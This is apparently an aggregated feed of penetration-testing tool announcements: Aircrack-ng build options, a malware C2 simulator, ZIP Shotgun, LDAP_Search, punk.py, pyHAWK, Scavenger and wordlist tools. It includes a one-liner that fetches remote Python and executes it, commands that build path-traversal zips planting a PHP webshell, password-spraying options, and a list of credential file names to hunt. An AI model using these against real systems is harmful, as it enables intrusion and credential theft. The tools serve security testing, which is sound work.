    • with-duma: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma
    • disable-libnl: Set-up the project to be compiled without libnl (1 or 3). Linux option only.
    • without-opt: Do not enable stack protector (on GCC 4.9 and above).
    • enable-shared: Make OSdep a shared library.
    • disable-shared: When combined with enable-static, it will statically compile Aircrack-ng.
    • with-avx512: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.
    • with-static-simd=: Compile a single optimization in aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization in the binary. --with-static-simd merely allows to choose another one.

    Examples:
    • Configure and compiling:
      ./configure --with-experimental
      make
    • Compiling with gcrypt:
      ./configure --with-gcrypt
      make
    • Installing:
      make install
    • Installing (strip binaries):
      make install-strip
    • Installing, with external scripts:
      ./configure --with-experimental --with-ext-scripts
      make
      make install
    • Testing (with sqlite, experimental and pcre)
      ./configure --with-experimental
      make
      make check
    • Compiling on OS X with macports (and all options):
      ./configure --with-experimental
      gmake
    • Compiling on OS X 10.10 with XCode 7.1 and Homebrew:
      env CC=gcc-4.9 CXX=g++-4.9 ./configure
      make
      make check
      NOTE: Older XCode ships with a version of LLVM that does not support CPU feature detection; which causes the ./configure to fail. To work around this older LLVM, it is required that a different compile suite is used, such as GCC or a newer LLVM from Homebrew.
      If you wish to use OpenSSL from Homebrew, you may need to specify the location to its' installation. To figure out where OpenSSL lives, run:
      brew --prefix openssl
      Use the output above as the DIR for --with-openssl=DIR in the ./configure line:
      env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
      make
      make check
    • Compiling on FreeBSD with gcc8
      env CC=gcc8 CXX=g++8 MAKE=gmake ./configure
      gmake
    • Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in Aircrack-ng directory)
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
      cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
      dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
      autoreconf -i
      ./configure --with-experimental --with-airpcap=$(pwd)
      make
    • Compiling on DragonflyBSD with gcrypt using GCC 7
      autoreconf -i
      env CC=gcc7 CXX=g++7 MAKE=gmake ./configure --with-experimental --with-gcrypt
      gmake
    • Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)
      export AUTOCONF_VERSION=2.69
      export AUTOMAKE_VERSION=1.16
      autoreconf -i
      env MAKE=gmake ./configure
      gmake

    Packaging
    Automatic detection of CPU optimization is done at run time. This behavior is desirable when packaging Aircrack-ng (for a Linux or other distribution.)
    Also, in some cases it may be desired to provide your own flags completely and not having the suite auto-detect a number of optimizations. To do this, add the additional flag --without-opt to the ./configure line:
    ./configure --without-opt

    Using precompiled binaries

    Linux/BSD
    • Use your package manager to download aircrack-ng
    • In most cases, they have an old version.

    Windows
    • Install the appropriate "monitor" driver for your card (standard drivers doesn't work for capturing data).
    • aircrack-ng suite is command line tools. So, you have to open a commandline Start menu -> Run... -> cmd.exe then use them
    • Run the executables without any parameters to have help

    Documentation
    Documentation, tutorials, ... can be found on https://aircrack-ng.org
    See also manpages and the forum.
    For further information check the README file


    imaginaryC2 - Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware

    $
    0
    0

    author: Felix Weyne (website) (Twitter)

    Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware.
    Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.

    By using this tool, an analyst can feed the malware consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can capture and inspect HTTP requests towards a domain/IP which is off-line at the time of the analysis.

    Replay packet captures
    Imaginary C2 provides two scripts to convert packet captures (PCAPs) or Fiddler Session Archives into request definitions which can be parsed by imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request.

    Technical details
    requirements: Imaginary C2 requires Python 2.7 and Windows.
    modules: Currently, Imaginary C2 contains three modules and two configuration files:
    FilenameFunction
    1. imaginary_c2.pyHosts python's simple HTTP server. Main module.
    2. redirect_to_imaginary_c2.pyAlters Windows' host file and Windows' (IP) Routing Table.
    3. unpack_fiddler_archive.py & unpack_pcap.pyExtracts HTTP responses from packet captures. Adds corresponding HTTP request domains and URLs to the configuration files.
    4. redirect_config.txtContains domains and IPs which needs to be redirected to localhost (to the python HTTP server).
    5. requests_config.txtContains URL path definitions with the corresponding data sources.
    request definitions: Each (HTTP) request defined in the request configuration consists of two parameters:
    Parameter 1: HTTP request URL path (a.k.a. urlType)
    ValueMeaning
    fixedDefine the URL path as a literal string
    regexDefine a regex pattern to be matched on the URL path
    Parameter 2: HTTP response source (a.k.a. sourceType)
    ValueMeaning
    dataImaginary C2 will respond with the contents of a file on disk
    pythonImaginary C2 will run a python script. The output of the python script defines the HTTP response.

    Demo use case: Simulating TrickBot servers
    Imaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot's web injection servers.

    How it works:
    Upon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The Trickbot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a svchost.exe instance.


    One of TrickBot's plugins is called injectdll, a plugin which is responsible for TrickBot's webinjects. The injectdll plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a webfake server is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the webfake server. The webfake server hosts a replica of the targeted website. This replica website usually is used in a social-engineering attack to defraud the victim.

    Imaginary C2 in action:
    The below video shows the TrickBot downloader running inside svchost.exe and connecting to imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned svchost.exe instance. The webinject module tries to steal the browser's saved passwords and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the webfake server. In the demo, the webfake server hosts the message: "Default imaginary C2 server response" (full video).



    ZIP Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

    $
    0
    0

    Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post on Silent Signal Techblog - Compressed File Upload And Command Execution and from OWASP - Test Upload of Malicious Files
    This script will create archive which contains files with "../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.
    Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HERE

    Installation
    1. Install using Python pip
      pip install zip-shotgun --upgrade
    2. Clone git repository and install
      git clone https://github.com/jpiechowka/zip-shotgun.git
      Execute from root directory of the cloned repository (where setup.py file is located)
      pip install . --upgrade

    Usage and options
    Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

    Options:
    --version Show the version and exit.
    -c, --directories-count INTEGER
    Count of how many directories to go back
    inside the zip file (e.g 3 means that 3
    files will be added to the zip: shell.php,
    ../shell.php and ../../shell.php where
    shell.php is the name of the shell you
    provided or randomly generated value
    [default: 16]
    -n, --shell-name TEXT Name of the shell inside the generated zip
    file (e.g shell). If not provided it will be
    randomly generated. Cannot have whitespaces
    -f, --shell-file-path PATH A file that contains code for the shell. If
    this option is not provided wwwolf
    (https://github.com/WhiteWinterWolf/wwwolf-
    php-webshell) php shell will be added
    instead. If name is provided it will be
    added to the zip with the provided name or
    if not provided the name will be randomly
    generated.
    --compress Enable compression. If this flag is set
    archive will be compressed using DEFALTE
    algorithm with compression level of 9. By
    default there is no compression applied.
    -h, --help Show this message and exit.

    Examples
    1. Using all default options
      zip-shotgun archive.zip
      Part of the script output
      12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
      12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
      ...
      12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
    2. Using default options and enabling compression for archive file
      zip-shotgun --compress archive.zip
      Part of the script output
      12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
      12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
      ...
      12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
    3. Using default options but changing the number of directories to go back in the archive to 3
      zip-shotgun --directories-count 3 archive.zip
      zip-shotgun -c 3 archive.zip
      The script will write 3 files in total to the archive
      Part of the script output
      12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
      12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
      12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
    4. Using default options but providing shell name inside archive and enabling compression
      Shell name cannot have whitespaces
      zip-shotgun --shell-name custom-name --compress archive.zip
      zip-shotgun -n custom-name --compress archive.zip
      Name for shell files inside the archive will be set to the one provided by the user.
      Part of the script output
      12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php
      ...
      12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL
    5. Provide custom shell file but use random name inside archive. Set directories count to 3
      zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
      zip-shotgun -c 3 -f ./custom-shell.php archive.zip
      Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
      Part of the script output
      12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
      12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
    6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
      zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
      zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
      Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
      Part of the script output
      12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
      12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL


    LDAP_Search - Tool To Perform LDAP Queries And Enumerate Users, Groups, And Computers From Windows Domains

    $
    0
    0

    LDAP_Search can be used to enumerate Users, Groups, and Computers on a Windows Domain. Authentication can be performed using traditional username and password, or NTLM hash. In addition, this tool has been modified to allow brute force/password-spraying via LDAP. Ldap_Search makes use of Impackets python36 branch to perform the main operations. (These are the guys that did the real heavy lifting and deserve the credit!)

    Installation
    git clone --recursive https://github.com/m8r0wn/ldap_search
    cd ldap_search
    sudo chmod +x setup.sh
    sudo ./setup.sh

    Usage
    Enumerate all active users on a domain:
    python3 ldap_search.py users -u user1 -p Password1 -d demo.local
    Lookup a single user and display field headings:
    python3 ldap_search.py users -q AdminUser -u user1 -p Password1 -d demo.local
    Enumerate all computers on a domain:
    python3 ldap_search.py computers -u user1 -p Password1 -d demo.local
    Search for end of life systems on the domain:
    python3 ldap_search.py computers -q eol -u user1 -p Password1 -d demo.local -s DC01.demo.local
    Enumerate all groups on the domain:
    python3 ldap_search.py groups -u user1 -p Password1 -d demo.local -s 192.168.1.1
    Query group members:
    python3 ldap_search.py groups -q "Domain Admins" -u user1 -p Password1 -d demo.local

    Queries
    Below are the query options that can be specified using the "-q" argument:
    User
    active / [None] - All active users (Default)
    all - All users, even disabled
    [specific account or email] - lookup user, ex. "m8r0wn"

    group
    [None] - All domain groups
    [Specific group name] - lookup group members, ex. "Domain Admins"

    computer
    [None] - All Domain Computers
    eol - look for all end of life systems on domain

    Options
    positional arguments:
    lookup_type Lookup Types: user, group, computer

    optional arguments:
    -q QUERY Specify user or group to query or use eol.
    -u USER Single username
    -U USER Users.txt file
    -p PASSWD Single password
    -P PASSWD Password.txt file
    -H HASH Use Hash for Authentication
    -d DOMAIN Domain (Ex. demo.local)
    -s SRV, -srv SRV LDAP Server (optional)
    -t TIMEOUT Connection Timeout (Default: 4)
    -v Show Search Result Attribute Names
    -vv Show Failed Logins & Errors


    Punk.Py - Unix SSH Post-Exploitation Tool

    $
    0
    0

    unix SSHpost-exploitation 1337 tool

    how it works
    punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on standard python2 installations.

    examples
    standard execution:
     ~$ ./punk.py
    skip passwd checks and use a custom home path:
     ~$ ./punk.py --no-passwd --home /home/ldapusers/
    execute commands with sudo:
     ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
    one-liner fileless ( with --no-passwd parameter ):
     ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

    TODO


    R3Con1Z3R - A Lightweight Web Information Gathering Tool With An Intuitive Features (OSINT)

    $
    0
    0

    R3con1z3r is a lightweight Web information gathering tool with an intuitive features written in python. it provides a powerful environment in which open source intelligence (OSINT) web-based footprinting can be conducted quickly and thoroughly.
    Footprinting is the first phase of ethical hacking, its the collection of every possible information regarding the target. R3con1z3r is a passive reconnaissance tool with built-in functionalities which includes: HTTP header flag, Traceroute, Whois Footprinting, DNS information, Site on same server, Nmap port scanner, Reverse Target and hyperlinks on a webpage. The tool, after being provided with necessary inputs generates an output in HTML format.

    Screenshots



    Installation
    r3con1z3r supports Python 2 and Python 3.
    $ git clone https://github.com/abdulgaphy/r3con1z3r.git
    $ cd r3con1z3r
    $ pip install -r requirements.txt
    Optional for Linux users
    $ sudo chmod +x r3con1z3r.py

    Moduldes
    r3con1z3r depends only on the sys and the requests python modules.
    Python 3:$ pip3 install -r requirements.txt
    For Coloring on Windows:pip install win_unicode_console colorama

    Usage
    python3 r3con1z3r.py [domain.com]

    Examples
    • To run on all Operating Systems (Linux, Windows, Mac OS X, Android e.t.c) i.e Python 2 environment
    python r3con1z3r.py google.com
    • To run on python3 environment:
    python3 r3con1z3r.py facebook.com
    • To run as executable Unix only
    ./r3con1z3r.py google.com



    Deep Explorer - Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained

    $
    0
    0

    Dependencies
     pip3 install -r requirements.txt
    also you should have Tor installed

    Usage
    python3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWL
    Examples:
    python3 deepexplorer.py "legal thing" 40 default legal (will crawl if results obtained in browser do not reach 40, also the script will show links which have "legal" string in html [like intext dork in google])
    python3 deepexplorer.py "ilegal thing" 30 all dni(will crawl every link obtained in browser [ultil reachs 30], also the script will show links which have "dni" string in html [like intext dork in google])
    python3 deepexplorer.py "legal thing" 30 none (do not crawl, only obtain links from browser)

    About
    Deep Explorer is a tool designed to search (any) thing in a few seconds
    Any idea, failure etc please report to telegram: blueudp
    results.txt contains results obtaioned in previus search
    Tested in ParrotOS and Kali Linux 2.0

    Type of Errors
    • Error importing... -> You should try manual pip install package
    • Error connecting to server -> Cant connect to ahmia browser If deep explorer can not execute service ..., do it manually, deep explorer checks the tor instance at the beginning so it will skip that part

    Contact
    Name: Eduardo Pérez-Malumbres
    Telegram: @blueudp
    Twitter: https://twitter.com/blueudp


    Hashie - Crack Hashes In A Blink Of An Eye

    $
    0
    0

    Hashie is a multi functional tool written in python to deal with hashes.

    Features
    • Hash cracking.
    • Hash generation.
    • Automatic hash type identification.
    • Supports MD5, SHA1, SHA256, SHA384, SHA512 etc...

    How to Install and Run in Linux
    [1] Enter the following command in the terminal to download it.
    git clone https://github.com/Sameera-Madhushan/Hashie
    [2] After downloading the program, enter the following command to navigate to the Digger directory and listing the contents
    cd Hashie && ls
    [3] Install dependencies
    pip3 install -r requirements.txt
    [4] Now run the script with following command.
    python3 hashie.py

    How to Install and Run in Windows
    [1] Download and run Python 2.7.x and Python 3.7 setup file from Python.org
    • In Install Python 3.7, enable Add Python 3.6 to PATH
    [2] Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.
    [3] Afther that, Run Command Propmt and enter this commands:
    git clone https://github.com/Sameera-Madhushan/Hashie
    cd Hashie
    pip3 install -r requirements.txt
    python3 hashie.py


    pyHAWK - Searches The Directory Of Choice For Interesting Files. Such As Database Files And Files With Passwords Stored On Them

    $
    0
    0

    Searches the directory of choice for interesting files. Such as database files and files with passwords stored on them

    Features
    • Scans directory for intresting file types
    • Outputs them to the screen
    • Supports many file types

    Installation Instructions
    The installation is easy. Git clone the repo and run go build.
    git clone https://github.com/MetaChar/pyHAWK
    python2 main.py

    Usage
    To set a Directory use -d or --directory
    python2 main.py -d <directory>

    File Extensions

    Cryptography
    • .pem
    • .pkcs12
    • .p12
    • .pfx
    • .asc
    • .jks
    • .keychain

    Password Files
    • .agilekeychain
    • .kwallet
    • .bek
    • .tpm
    • .psafe3

    Database Files
    • .sdf
    • .sqlite
    • .fve
    • .pcap
    • .gnucash
    • .dayone
    • .mdf

    Misc Files
    • .log

    Config Files
    • .cscfg
    • .rdp
    • .tblk
    • .ovpn

    File Names

    Password Files
    • credentials.xml
    • robomongo.json
    • filezilla.xml
    • recentservers.xml
    • ventrilo_srv.ini
    • terraform.tfvars
    • secret_token.rb
    • carrierwave.rb
    • omniauth.rb
    • settings.py
    • database.yml

    Database Files
    • journal.txt
    • Favorites.plist

    Misc Files
    • root.txt
    • users.txt
    • passwords.txt
    • login.txt

    Config Files
    • jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml
    • LocalSettings.php
    • configuration.user.xpl
    • knife.rb

    Insperation
    Inspired by ice3man543 check it out here : https://github.com/Ice3man543/hawkeye


    Scavenger - Is A Multi-Threaded Post-Exploitation Scanning Tool For Scavenging Systems, Finding Most Frequently Used Files And Folders As Well As "Interesting" Files Containing Sensitive Information

    $
    0
    0

    scavenger : is a multi-threaded post-exploitationscanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.

    Problem Definition:
    Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.

    Requirements:

    Examples:
    $ python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
    $ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite

    Blog Post:
    Link to Trustwave SpiderLabs Blog

    Acknowledgements - Powered and Inspired by:


    Wordlistctl - Fetch, Install And Search Wordlist Archives From Websites And Torrent Peers

    $
    0
    0

    Script to fetch, install, update and search wordlist archives from websites offering wordlists with more than 1800 wordlists available.
    In the latest version of the Blackarch Linux it has been added to /usr/share/wordlists/ directory.

    Installation
    pacman -S wordlistctl

    Usage
    [ sepehrdad@blackarch-dev ~/blackarch/repos/wordlistctl ]$ wordlistctl -H
    --==[ wordlistctl by blackarch.org ]==--

    usage:

    wordlistctl -f <arg> [options] | -s <arg> [options] | -S <arg> | <misc>

    options:

    -f <num> - download chosen wordlist - ? to list wordlists with id
    -d <dir> - wordlists base directory (default: /usr/share/wordlists)
    -c <num> - change wordlists category - ? to list wordlists categories
    -s <regex> - wordlist to search using <regex> in base directory
    -S <regex> - wordlist to search using <regex> in sites
    -h - prefer http
    -X - decompress wordlist
    -F <str> - list wordlists in categories given
    -r - remove compressed file after decompression
    -t <num> - max download threads (default: 10)

    misc:

    -U - update config files
    -V - print version of wordlistctl and exit
    -H - print this help and exit

    example:

    # download and decompress all wordlists and remove archive
    $ wordlistctl -f 0 -Xr

    # download all wordlists in username category
    $ wordlistctl -f 0 -c 0

    # list all wordlists in password category with id
    $ wordlistctl -f ? -c 1

    # download and decompress all wordlists in misc category
    $ wordlistctl -f 0 -c 4 -X

    # download all wordlists in filename category using 20 threads
    $ wordlistctl -c 3 -f 0 -t 20

    # download wordlist with id 2 to "~/wordlists" directory using http
    $ wordlistctl -f 2 -d ~/wordlists -h
    # print wordlists in username and password categories
    $ wordlistctl -F username,password

    Get Involved
    You can get in touch with the BlackArch Linux team. Just check out the following:
    Please, send us pull requests!
    Web:https://www.blackarch.org/
    Mail:team@blackarch.org
    IRC: irc://irc.freenode.net/blackarch


    Viewing all 5854 articles
    Browse latest View live